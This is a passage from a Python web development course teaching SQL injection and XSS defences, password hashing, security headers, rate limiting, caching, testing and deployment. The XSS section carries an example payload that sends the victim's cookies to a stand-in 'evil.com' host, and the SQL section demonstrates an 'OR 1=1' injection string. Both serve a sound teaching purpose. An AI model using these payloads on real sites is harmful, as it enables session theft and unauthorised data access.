cursor.execute("SELECT * FROM users WHERE email = %s", (user_input,))

# ✅ SAFE with an ORM (SQLAlchemy):
user = db.query(User).filter(User.email == user_input).first()
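
The difference between the two approaches can be observed with the standard library's `sqlite3` module and an in-memory database. This is a self-contained sketch: the table contents and function names are made up for the demonstration, and the payload uses `OR '1'='1'` because `sqlite3` refuses to run more than one statement per `execute` call.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT)")
conn.executemany(
    "INSERT INTO users (email) VALUES (?)",
    [("ana@example.com",), ("ion@example.com",)],
)


def find_user_unsafe(email: str) -> list[tuple]:
    # VULNERABLE: the input becomes part of the SQL text itself.
    query = f"SELECT id, email FROM users WHERE email = '{email}'"
    return conn.execute(query).fetchall()


def find_user_safe(email: str) -> list[tuple]:
    # SAFE: the driver passes the value separately from the SQL text.
    return conn.execute(
        "SELECT id, email FROM users WHERE email = ?", (email,)
    ).fetchall()


payload = "' OR '1'='1"
print(len(find_user_unsafe(payload)))   # every row matches the injected condition
print(len(find_user_safe(payload)))     # no user has this literal string as email
```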

23.2 Cross-Site Scripting (XSS)

# ❌ VULNERABLE:
@app.route("/search")
def search():
    query = request.args.get("q", "")
    return f"<h1>Results for: {query}</h1>"
# If q = <script>document.location='https://evil.com/?c='+document.cookie</script>

# ✅ SAFE: escape HTML (template engines such as Jinja2 do this automatically)
from markupsafe import escape

@app.route("/search")
def search():
    query = request.args.get("q", "")
    return f"<h1>Results for: {escape(query)}</h1>"

# ✅ DEFENSE IN DEPTH: Content Security Policy header
# (limits what injected markup can do; it does not replace escaping)
# Content-Security-Policy: default-src 'self'; script-src 'self'
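
The effect of escaping can be checked without a web framework. The sketch below uses `html.escape` from the standard library instead of `markupsafe.escape`; both replace the characters that have a special meaning in HTML. The function name `render_results` is hypothetical.

```python
from html import escape


def render_results(query: str) -> str:
    """Return the heading for a search page with the user input escaped."""
    return f"<h1>Results for: {escape(query)}</h1>"


payload = "<script>alert(1)</script>"
print(render_results(payload))
# The angle brackets arrive in the browser as &lt; and &gt;, so the payload
# is displayed as text instead of being executed as a script.
```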

23.3 Broken Authentication

# ❌ WRONG: storing passwords in plain text
users_db[email] = {"password": "plain_text_password"}

# ✅ CORRECT: hash with bcrypt (a random salt is generated and embedded)
import bcrypt

def hash_password(password: str) -> str:
    # bcrypt only uses the first 72 bytes of the password
    return bcrypt.hashpw(password.encode(), bcrypt.gensalt()).decode()

def verify_password(password: str, hashed: str) -> bool:
    return bcrypt.checkpw(password.encode(), hashed.encode())

# Storing:
hashed = hash_password("MySecretPassword123!")
# "$2b$12$LJ3m4ks8Rt4..." (salt + hash, 60 characters)

# Verifying:
if verify_password("MySecretPassword123!", hashed):
    print("Authentication successful!")
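
Where installing bcrypt is not an option, the same idea (a random salt per password plus a deliberately slow hash) can be sketched with the standard library only. This swaps in PBKDF2-HMAC-SHA256, which is a different algorithm from bcrypt; the storage format and the iteration count below are assumptions chosen for illustration, and the count should be tuned to current guidance and hardware.

```python
import hashlib
import hmac
import secrets

ITERATIONS = 600_000   # assumed default; higher is slower and harder to brute-force


def hash_password(password: str, iterations: int = ITERATIONS) -> str:
    """Return 'pbkdf2_sha256$<iterations>$<salt hex>$<hash hex>'."""
    salt = secrets.token_bytes(16)   # fresh random salt for every password
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute the hash with the stored salt and compare in constant time."""
    _scheme, iterations, salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(digest, bytes.fromhex(digest_hex))


stored = hash_password("MySecretPassword123!")
print(verify_password("MySecretPassword123!", stored))
print(verify_password("wrong-password", stored))
```

Storing the iteration count next to the hash makes it possible to raise the cost later and re-hash passwords as users log in.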

25. CORS, CSRF, CSP and security headers

# === CORS (Cross-Origin Resource Sharing) ===
# By default the browser does not let scripts read responses to cross-origin
# requests (requests to another origin: scheme + host + port).
# The server has to allow the calling origin explicitly.

from fastapi.middleware.cors import CORSMiddleware

app.add_middleware(
    CORSMiddleware,
    allow_origins=["https://myapp.com", "https://admin.myapp.com"],  # NOT ["*"] in production!
    allow_credentials=True,
    allow_methods=["GET", "POST", "PUT", "DELETE"],
    allow_headers=["Authorization", "Content-Type"],
    max_age=3600,    # Cache the preflight response for 1 hour
)

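# === CSRF (Cross-Site Request Forgery) ===
# The attacker makes the victim's browser send a request that carries the
# victim's cookies. Protection: a unique CSRF token per session/form.
# APIs authenticated only through an Authorization header are not exposed to
# this, because the browser does not attach that header automatically.

# FastAPI with cookies:
from fastapi_csrf_protect import CsrfProtect  # pip install fastapi-csrf-protect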

# === Security Headers (middleware) ===
from starlette.middleware.base import BaseHTTPMiddleware

class SecurityHeadersMiddleware(BaseHTTPMiddleware):
    async def dispatch(self, request, call_next):
        response = await call_next(request)
        response.headers["Strict-Transport-Security"] = "max-age=31536000; includeSubDomains"
        response.headers["X-Content-Type-Options"] = "nosniff"
        response.headers["X-Frame-Options"] = "DENY"
        response.headers["X-XSS-Protection"] = "0"
        response.headers["Referrer-Policy"] = "strict-origin-when-cross-origin"
        response.headers["Content-Security-Policy"] = "default-src 'self'"
        response.headers["Permissions-Policy"] = "camera=(), microphone=(), geolocation=()"
        return response

app.add_middleware(SecurityHeadersMiddleware)

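27. Rate limiting, input validation and sanitization

from fastapi import Request
from slowapi import Limiter, _rate_limit_exceeded_handler
from slowapi.errors import RateLimitExceeded
from slowapi.util import get_remote_address

# === Rate Limiting ===
limiter = Limiter(key_func=get_remote_address)
# slowapi looks the limiter up on app.state and needs a handler that turns
# RateLimitExceeded into a 429 response:
app.state.limiter = limiter
app.add_exception_handler(RateLimitExceeded, _rate_limit_exceeded_handler)

@app.get("/api/search")
@limiter.limit("30/minute")
async def search(request: Request, q: str):    # slowapi requires the `request` argument
    return {"results": do_search(q)}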

# === Input Validation (Pydantic) ===
from pydantic import BaseModel, EmailStr, Field, field_validator
import re

class RegistrationForm(BaseModel):
    # The allowlist pattern already rejects quotes, semicolons and spaces.
    username: str = Field(min_length=3, max_length=30, pattern=r"^[a-zA-Z0-9_]+$")
    email: EmailStr
    password: str = Field(min_length=8, max_length=128)

    @field_validator("password")
    @classmethod
    def password_strength(cls, v):
        if not re.search(r"[A-Z]", v):
            raise ValueError("Password must contain uppercase letter")
        if not re.search(r"[a-z]", v):
            raise ValueError("Password must contain lowercase letter")
        if not re.search(r"\d", v):
            raise ValueError("Password must contain digit")
        return v

    # Note: do not add a keyword blocklist ("DROP", "DELETE", "INSERT", ...) for
    # the username. The allowlist pattern above already excludes quotes,
    # semicolons and comment markers, and a blocklist would reject legitimate
    # names such as "dropbox_fan". SQL injection is prevented by parameterized
    # queries (section 23.1), not by filtering words out of the input.

PART VI: ADVANCED ARCHITECTURES AND PATTERNS

28. Microservices and inter-service communication

# === Synchronous (HTTP) communication between microservices ===
class OrderService:
    def __init__(self, user_service_url: str, inventory_service_url: str):
        self.user_url = user_service_url
        self.inventory_url = inventory_service_url
        self.session = create_resilient_session()  # Session with retry

    # Plain `def`: the session is a blocking HTTP client, so calling it from
    # an `async def` method would stall the event loop.
    def create_order(self, user_id: int, product_id: int, qty: int):
        # 1. Check the user (raise_for_status turns 4xx/5xx into an exception):
        resp = self.session.get(f"{self.user_url}/api/users/{user_id}", timeout=5)
        resp.raise_for_status()
        user = resp.json()

        # 2. Check the stock:
        resp = self.session.get(
            f"{self.inventory_url}/api/products/{product_id}/stock", timeout=5
        )
        resp.raise_for_status()
        if resp.json()["available"] < qty:
            raise InsufficientStockError()

        # 3. Reserve the stock:
        self.session.post(
            f"{self.inventory_url}/api/products/{product_id}/reserve",
            json={"quantity": qty}, timeout=5
        ).raise_for_status()

        # 4. Create the order locally. If this step fails, the reservation
        #    from step 3 has to be released (compensating action).
        order = save_order(user_id, product_id, qty)
        return order

# === Asynchronous communication (message queue): more resilient ===
# When the Order Service creates an order:
# 1. It saves the order in its own DB
# 2. It publishes an "order.created" event to a message queue (Redis/RabbitMQ/Kafka)
# 3. The Inventory Service consumes the event and updates the stock
# 4. The Payment Service consumes the event and processes the payment
# 5. The Notification Service consumes the event and sends an email
# → The services are decoupled: one going down does not take the others with it
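
The decoupling described in the steps above can be illustrated with a tiny in-process event bus. This is only a teaching sketch: `EventBus` is a hypothetical class, and a real deployment would rely on a broker such as RabbitMQ or Kafka, which also persists events and redelivers them to consumers that were down.

```python
from collections import defaultdict
from typing import Callable

Handler = Callable[[dict], None]


class EventBus:
    """Minimal publish/subscribe hub that isolates consumer failures."""

    def __init__(self) -> None:
        self._subscribers: dict[str, list[Handler]] = defaultdict(list)

    def subscribe(self, topic: str, handler: Handler) -> None:
        self._subscribers[topic].append(handler)

    def publish(self, topic: str, event: dict) -> list[Exception]:
        """Deliver the event to every subscriber; return the errors raised."""
        errors: list[Exception] = []
        for handler in self._subscribers.get(topic, []):
            try:
                handler(event)
            except Exception as exc:
                # One failing consumer must not stop the remaining consumers.
                errors.append(exc)
        return errors


def payment_service(event: dict) -> None:
    raise RuntimeError("payment provider unavailable")


bus = EventBus()
log: list[str] = []
bus.subscribe("order.created", lambda e: log.append(f"inventory: order {e['order_id']}"))
bus.subscribe("order.created", payment_service)
bus.subscribe("order.created", lambda e: log.append(f"email: order {e['order_id']}"))

failures = bus.publish("order.created", {"order_id": 7})
print(log)        # inventory and email still ran
print(failures)   # the payment failure is reported, not propagated
```

The publisher never calls the consumers directly, so adding a new consumer does not require changing the Order Service.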

30. Web-level caching

import hashlib
import json
from functools import wraps

import redis

# Redis cache:
cache = redis.Redis(host="localhost", port=6379, db=0, decode_responses=True)

def cached(ttl_seconds: int = 300):
    """Redis-backed caching decorator (the result must be JSON-serializable)."""
    def decorator(func):
        @wraps(func)
        async def wrapper(*args, **kwargs):
            # Build the cache key. The built-in hash() is randomized per process
            # for strings, so keys would differ between workers and restarts;
            # a SHA-256 digest is stable.
            raw = json.dumps([args, kwargs], sort_keys=True, default=str)
            key = f"cache:{func.__name__}:{hashlib.sha256(raw.encode()).hexdigest()}"

            # Check the cache:
            cached_result = cache.get(key)
            if cached_result is not None:
                return json.loads(cached_result)

            # Run the function:
            result = await func(*args, **kwargs)

            # Store in the cache:
            cache.setex(key, ttl_seconds, json.dumps(result, default=str))

            return result
        return wrapper
    return decorator

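@app.get("/api/products/{product_id}")
@cached(ttl_seconds=600)    # Cache for 10 minutes
async def get_product(product_id: int):
    # Expensive DB query. Return a plain dict: an ORM object would be cached
    # as its str() representation because of json.dumps(default=str).
    # (The field names below are illustrative.)
    product = db.query(Product).filter(Product.id == product_id).first()
    return {"id": product.id, "name": product.name} if product else None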

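# HTTP cache headers:
import hashlib
import json
from fastapi.responses import JSONResponse

@app.get("/api/config")
async def get_config():
    config = load_config()
    response = JSONResponse(content=config)
    response.headers["Cache-Control"] = "public, max-age=3600"    # 1 hour
    # Derive the ETag from the content with a stable digest; the built-in
    # hash() is randomized per process, so workers would disagree on the tag.
    digest = hashlib.sha256(json.dumps(config, sort_keys=True).encode()).hexdigest()
    response.headers["ETag"] = f'"{digest[:16]}"'
    return response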

31. Testing web applications

import pytest
from fastapi.testclient import TestClient
from httpx import AsyncClient

# === TestClient (synchronous, simple) ===
client = TestClient(app)

class TestUserAPI:
    def test_create_user(self):
        response = client.post(
            "/api/users",
            json={"name": "Ana", "email": "ana@test.com", "age": 21},
            headers={"Authorization": "Bearer secret-token"}
        )
        assert response.status_code == 201
        data = response.json()
        assert data["name"] == "Ana"
        assert "id" in data

    def test_create_user_duplicate_email(self):
        client.post("/api/users", json={"name": "A", "email": "dup@test.com", "age": 20},
                     headers={"Authorization": "Bearer secret-token"})
        response = client.post(
            "/api/users", json={"name": "B", "email": "dup@test.com", "age": 25},
            headers={"Authorization": "Bearer secret-token"}
        )
        assert response.status_code == 409

    def test_get_user_not_found(self):
        response = client.get("/api/users/99999")
        assert response.status_code == 404

    def test_create_user_validation(self):
        response = client.post(
            "/api/users",
            json={"name": "", "email": "invalid", "age": -1},
            headers={"Authorization": "Bearer secret-token"}
        )
        assert response.status_code == 422     # Validation error

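    def test_unauthorized(self):
        response = client.post("/api/users", json={"name": "X", "email": "x@x.com", "age": 20})
        # HTTPBearer rejects a missing header with 403 in older FastAPI
        # releases and with 401 in newer ones, so accept either.
        assert response.status_code in (401, 403)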

    def test_list_users_pagination(self):
        response = client.get("/api/users?page=1&per_page=5")
        assert response.status_code == 200
        data = response.json()
        assert "data" in data
        assert "total" in data
        assert len(data["data"]) <= 5

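# === Async testing (httpx) ===
# Recent httpx releases no longer accept the `app=` shortcut;
# pass an ASGITransport instead.
from httpx import ASGITransport

@pytest.mark.anyio
async def test_async_endpoint():
    transport = ASGITransport(app=app)
    async with AsyncClient(transport=transport, base_url="http://test") as ac:
        response = await ac.get("/health")
        assert response.status_code == 200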

# === Mocking external APIs ===
from unittest.mock import patch

def test_order_with_mocked_payment():
    with patch("services.payment.charge") as mock_charge:
        mock_charge.return_value = {"transaction_id": "txn_123"}
        response = client.post("/api/orders", json={"product_id": 1, "qty": 2})
        assert response.status_code == 201
        mock_charge.assert_called_once()

32. Deployment and production

# === Gunicorn + Uvicorn (WSGI/ASGI production server) ===
# Never use `flask run` or `uvicorn --reload` in production!

# FastAPI (ASGI):
# gunicorn main:app -w 4 -k uvicorn.workers.UvicornWorker --bind 0.0.0.0:8000

# Flask (WSGI):
# gunicorn main:app -w 4 --bind 0.0.0.0:5000

# Production Dockerfile:
FROM python:3.12-slim

RUN groupadd -r app && useradd -r -g app app

WORKDIR /app
COPY requirements.txt .
RUN pip install --no-cache-dir -r requirements.txt

COPY src/ ./src/
USER app

EXPOSE 8000
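# python:3.12-slim does not ship curl, so the probe uses the Python standard library:
HEALTHCHECK --interval=30s --timeout=5s CMD python -c "import urllib.request; urllib.request.urlopen('http://localhost:8000/health', timeout=3)" || exit 1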

CMD ["gunicorn", "src.main:app", \
     "-w", "4", \
     "-k", "uvicorn.workers.UvicornWorker", \
     "--bind", "0.0.0.0:8000", \
     "--access-logfile", "-", \
     "--error-logfile", "-", \
     "--timeout", "30", \
     "--graceful-timeout", "30"]

# Nginx reverse proxy:
# limit_req_zone is only valid in the http {} context, so it is declared
# outside the server block (for example in a conf.d/*.conf file):
limit_req_zone $binary_remote_addr zone=api:10m rate=30r/s;

server {
    listen 443 ssl http2;
    server_name api.example.com;

    ssl_certificate     /etc/nginx/certs/fullchain.pem;
    ssl_certificate_key /etc/nginx/certs/privkey.pem;

    # Security headers
    add_header Strict-Transport-Security "max-age=31536000" always;
    add_header X-Content-Type-Options nosniff always;
    add_header X-Frame-Options DENY always;

    # Rate limiting: the "api" zone declared above is applied per location

    location /api/ {
        limit_req zone=api burst=50 nodelay;

        proxy_pass http://127.0.0.1:8000;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-Forwarded-Proto $scheme;

        proxy_connect_timeout 5s;
        proxy_read_timeout 30s;
    }

    location /static/ {
        alias /var/www/static/;
        expires 30d;
        add_header Cache-Control "public, immutable";
    }
}

Appendices

A. HTTP status codes: quick reference

2xx Success:  200 OK, 201 Created, 204 No Content
3xx Redirect: 301 Moved Permanently, 302 Found, 304 Not Modified
4xx Client:   400 Bad Request, 401 Unauthorized, 403 Forbidden,
              404 Not Found, 409 Conflict, 422 Unprocessable Content, 429 Too Many Requests
5xx Server:   500 Internal Server Error, 502 Bad Gateway, 503 Service Unavailable, 504 Gateway Timeout

B. Essential Python web libraries

HTTP Client:     requests, httpx (async), aiohttp
Web Frameworks:  Flask, FastAPI, Django, Starlette
Templating:      Jinja2, Mako
Validation:      Pydantic, marshmallow, cerberus
ORM:             SQLAlchemy, Tortoise-ORM, Peewee
Auth:            PyJWT, python-jose, authlib, passlib
Scraping:        BeautifulSoup4, lxml, Scrapy, Playwright, Selenium
Testing:         pytest, Starlette/FastAPI TestClient (built on httpx), responses (mock HTTP)
WebSockets:      websockets, python-socketio
Task Queues:     Celery, RQ, Dramatiq, Huey
Caching:         redis-py, cachetools
Rate Limiting:   slowapi, limits
Security:        bcrypt, argon2-cffi, cryptography

Course created as reference material for web developers, backend engineers and computer science students.
